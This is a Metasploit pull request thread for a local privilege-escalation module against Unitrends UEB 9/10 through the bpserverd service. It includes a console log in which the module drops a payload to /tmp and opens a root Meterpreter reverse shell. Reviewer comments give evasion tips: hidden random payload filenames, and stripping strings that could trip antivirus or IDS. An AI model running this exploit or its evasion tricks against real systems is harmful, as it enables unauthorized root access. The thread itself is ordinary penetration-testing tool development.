Ueb local privesc
rapid7/metasploit-framework pull request #9946
Opened 2018-04-27 20:56 UTC by synthsec

## Vulnerable Application

  Unitrends UEB 9/10 local privesc

  Still works on the demo version of the application available here:
  http://free-vmware-backup.unitrends.com/Unitrends-Free-VMware.ova

  This exploit leverages bpserverd proprietary protocol to issue commands
  as root.

## Verification Steps

  1. Get a shell with exploit/linux/http/ueb10_api_systems
  2. ```use exploit/linux/local/ueb_priv_esc ```
  3. ```set session [SESSION]```
  4. ```exploit```
  5. A highpriv meterpreter session should have been opened successfully

## Scenarios

### UEB 10.0 on CentOS 6.5

```
msf > use exploit/linux/local/ueb_priv_esc
msf exploit(linux/local/ueb_priv_esc) > set session 4
session => 4
msf exploit(linux/local/ueb_priv_esc) > exploit

[*] Started reverse TCP handler on 15.0.0.177:4444
[*] Writing payload executable to '/tmp/pEFoythF'
[*] Writing privesc script to '/tmp/CTZSovJR'
[*] Fixing permissions
[*] Sending stage (857352 bytes) to 10.20.1.202
[*] Meterpreter session 5 opened (15.0.0.177:4444 -> 10.20.1.202:45188) at 2018-04-27 16:44:28 -0400
[+] Deleted /tmp/pEFoythF
[+] Deleted /tmp/CTZSovJR

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0

```

2018-04-27 21:06 UTC, bcoles commented
Is there a reason this was written as a local exploit?

Based on the [documentation](https://support.unitrends.com/UnitrendsBackup/s/article/000002920), it's reasonable to expect that port `1743/tcp` will be exposed externally.

It would be more useful to make this a remote exploit. Users can pivot to the `127.0.0.1` interface via an existing session for privesc purposes.

There's also an existing Metasploit module [ueb9_bpserverd](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/ueb9_bpserverd.rb) for Unitrends UEB 9 which looks very similar. If the vulnerability has changed since version 9, it might make more sense to implement a target for version 10 in the existing module.

2018-04-27 21:27 UTC, synthsec commented
I think it's probably a good call to roll the UEB 10 remote exploit into the existing UEB 9 remote HTTP exploit. This one might warrant it's own submission though, just because it's mechanically a bit different than the existing bpserverd exploit despite looking very similar.

Basically, Unitrends patched the vulnerability exploited by the existing bpserverd module by removing remote access to port 1743. It's still listening on loop back, though, so once a low priv shell is established using ueb10_api_systems, this will get you root.

2018-04-27 21:58 UTC, bcoles commented
So the vulnerability hasn't changed?

Perhaps others will disagree with me (paging @wvu-r7 @sempervictus ), but I think the existing module is sufficient, although it could use a clean up, and some additional documentation to address the firewall changes in version 10.

Using the existing module implementation and pivoting over the session, with `route add 127.0.0.1 255.255.255.255 1`, is much cleaner. It saves a file write, and doesn't require `python` to be installed and in `$PATH`.

Admittedly, pivoting only works with Meterpreter sessions, and doesn't work with all Meterpreters (ie, Java Meterpreter).

If a local version of the module were to be written, it would be nice to use native Rex sockets, which would also avoid a file write.

2018-05-23 20:10 UTC, asoto-r7 commented
@synthsec: As @bcoles mentioned, we have a similar module: `exploit/linux/misc/ueb9_bpserverd`.  I would propose that we expand upon the existing [`ueb9_bpserverd`](https://www.rapid7.com/db/modules/exploit/linux/misc/ueb9_bpserverd) module.

Would you take a look at merging this with `ueb9_bpserverd`?

2018-06-13 14:01 UTC, bwatters-r7 commented
The more I look at this, the less sure I am about merging it in with the other ueb module.  Do we want to add a local privesc exploit to a non-local exploit module as a target, and then assume that users will 'figure it out' when looking for something to use?  There are a lot of odd corners in metasploit, so that might be completely normal, but it seems like that's asking for this code to get forgotten.  I do agree with @bcoles that this would be improved without the file write, though on the other hand, when I search for UEB in Google, the first hit is Urdu Educational Board in India.....   A second Google check  suggested that ~1,000 companies use Unitrends; having this exploit would help people, but do we need to spend significant time optimizing something that already works?  I'm more than happy to concede on any of these points, and I would be thrilled if someone wants to improve the existing module and polish up this one, but barring that, maybe we should just test and land it?  It is useful, it works, and it offers an ability we do not have.

2018-06-14 09:13 UTC, bcoles commented
@bwatters-r7  I vote for ship it :shipit:

> [...] merging it in with the other ueb module. Do we want to add a local privesc exploit to a non-local exploit module as a target, and then assume that users will 'figure it out' when looking for something to use?

I'm suggesting that using network pivots `route add` in lieu of this module would be stealthier and would prevent code duplication in the framework. However, network pivots require a meterpreter session rather than a shell command session, which adds validity to this PR as it "offers an ability we do not have".

On the topic of using Rex sockets to communicate with the local network interface, instead of dropping a file to disk, I still prefer Rex sockets, however I'm not going to implement it. There are zero examples of this code pattern in the framework from which the PR author can draw. So ship it.

2018-09-10 02:42 UTC, h00die commented
Here is my first attempt (completely untested) at rolling v9 and v10 together.

https://github.com/h00die/metasploit-framework/commit/589fb4bf3b5f941898d991c4f131642ad23d3dd6

2018-09-11 01:30 UTC, h00die commented
Finished testing the v9 and v10 integration, PR is up for review.  Once that lands i'll start looking at this LPE more.  Feel free to review!

2018-10-13 18:45 UTC, h00die requested changes

2018-10-13 18:45 UTC, h00die commented on modules/exploits/linux/local/ueb_priv_esc.rb
> +          ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/000006003'],
This is for the SQLi which is used in the HTTP exploits, not for the LPE.

2018-10-13 18:45 UTC, h00die commented on modules/exploits/linux/local/ueb_priv_esc.rb
> +          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2018-6329'],
same as above

2018-10-13 18:45 UTC, h00die commented on modules/exploits/linux/local/ueb_priv_esc.rb
> +          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2018-6329'],
also not needed because the CVE reference below will link up to the cve reference

2018-10-13 18:45 UTC, h00die commented on modules/exploits/linux/local/ueb_priv_esc.rb
> +    exe_path = "#{datastore['WritableDir']}/#{rand_text_alpha(6 + rand(5))}"
I would change the payload to be hidden, and maybe not so long.  @bcoles has this from EXTREMEPARR: `.#{rand_text_alphanumeric 5..10}`

2018-10-13 18:45 UTC, h00die commented on modules/exploits/linux/local/ueb_priv_esc.rb
> +    pes_path = "#{datastore['WritableDir']}/#{rand_text_alpha(6 + rand(5))}"
see above comment

2018-10-13 18:45 UTC, h00die commented on modules/exploits/linux/local/ueb_priv_esc.rb
> +    vprint_status cmd_exec("chmod +x #{pes_path}")
These two lines, when verbose is on, result in an empty string printing.  I'd remove the `vprint_status` and execute both chmods in a single `cmd_exec`

2018-10-13 18:45 UTC, h00die commented on modules/exploits/linux/local/ueb_priv_esc.rb
> +from optparse import OptionParser
When porting this script from python to metasploit framework,, a lot of this is code becomes unnecessary.
For instance, the `usage` statement is never printed, and therefore takes up un-needed space, as well as making an easy flag for AV or IDS.
The `-c` is always executed, so why not just use `sys.argv[1]`
The `-x` flag is never changed.  I would add an option to this module in msf to set it, then just make it a hardcoded variable.  Something similar to `XINETDPORT = "#{datastore['XINETDPORT']}"` similar to https://github.com/rapid7/metasploit-framework/pull/10663/files#diff-491e6d4287fa343279338ddf20bd311eR216

2018-10-13 19:02 UTC, h00die requested changes

2018-10-13 19:02 UTC, h00die commented on modules/exploits/linux/local/ueb_priv_esc.rb
> +          ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/000006003'],
I believe https://support.unitrends.com/UnitrendsBackup/s/article/000005691 is the right one

2018-10-13 19:02 UTC, h00die commented on documentation/modules/exploit/linux/local/ueb_priv_esc.md
> +### UEB 10.0 on CentOS 6.5
You could add an additional scenario with https://github.com/rapid7/metasploit-framework/pull/9946#issuecomment-429564158 showing 9.2

2018-10-13 19:02 UTC, h00die commented on documentation/modules/exploit/linux/local/ueb_priv_esc.md
> +  as root.
May want to add a section saying this was confirmed on 9.2 and 10.0
See https://github.com/rapid7/metasploit-framework/pull/10668/files#diff-1815cc92360882fded81d11cc48bb342R23 as a reference

2018-10-13 19:08 UTC, h00die commented
Looking at this code, i did think about commenting that the hard-coded `127.0.0.1` could be changed to an option, which would allow for the scenario of exploiting UEB on an internal network, pivoted through a meterp.  However, the current code executes a binary which is written to local disk, therefore preventing that from working.  If it was changed to use a command stager instead it could then be used either way.  However, then it feels like it really should be in remote exploit.

I vote, at this point, to leave it as is.  I think the probability of NEEDING this to work in a more dynamic fashion is outweighed by the fact that there are two remote exploits already that cover the same territory and it would therefore be redundant and unnecessary.

Based on the lack of response from #10616 I have a bad feeling that @synthsec isn't looking at this any more and won't get around to making these changes anyways :(

2018-11-10 13:42 UTC, h00die commented
@synthsec ping, you still around and interested in getting this module fixed up to be landed?

2018-11-16 01:19 UTC, h00die commented
Please see https://github.com/synthsec/metasploit-framework/pull/1 as it incorporates all of the requested changes.

2018-11-28 02:20 UTC, merged